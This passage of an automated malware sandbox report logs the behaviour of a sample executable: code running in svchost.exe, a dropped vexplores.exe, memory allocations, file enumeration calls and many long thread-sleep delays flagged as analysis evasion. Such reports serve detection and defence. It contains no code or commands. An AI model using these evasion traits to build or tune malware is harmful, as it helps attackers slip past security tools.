              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeAPI/Special instruction interceptor: Address: 3D770FC
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeAPI/Special instruction interceptor: Address: 3CDA50C
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 53F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 53F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 73F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5380000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5900000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7900000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598969Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598857Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598750Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597971Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597844Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597734Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597625Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597516Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597406Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597187Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597078Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596968Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596859Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596750Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596637Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596421Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596292Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596187Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596078Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595968Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595640Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594874Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599626Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599500Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599345Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599202Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598983Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598655Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598545Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596969Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596670Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596508Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596339Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596216Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593610Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2281Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7575Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2996Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 6812Jump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-88893
              Source: C:\Users\user\Desktop\kG713MWffq.exeAPI coverage: 3.7 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8172Thread sleep count: 2281 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8172Thread sleep count: 7575 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599563s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598969s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598857s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598750s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598641s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598422s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598312s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -598094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597971s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597844s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597734s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597625s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597516s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597297s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597187s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -597078s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596968s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596859s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596750s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596637s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596421s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596292s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596187s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -596078s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595968s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595859s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595750s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595640s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595531s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595422s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595312s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -595094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -594874s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -594765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -594656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 8168Thread sleep time: -594546s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1996Thread sleep count: 2996 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1996Thread sleep count: 6812 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599626s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599345s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599202s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598983s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598655s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598545s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -598094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597969s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -597110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596969s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596670s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596508s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596216s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -596110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -595110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -594110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -593985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -593860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -593735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1988Thread sleep time: -593610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
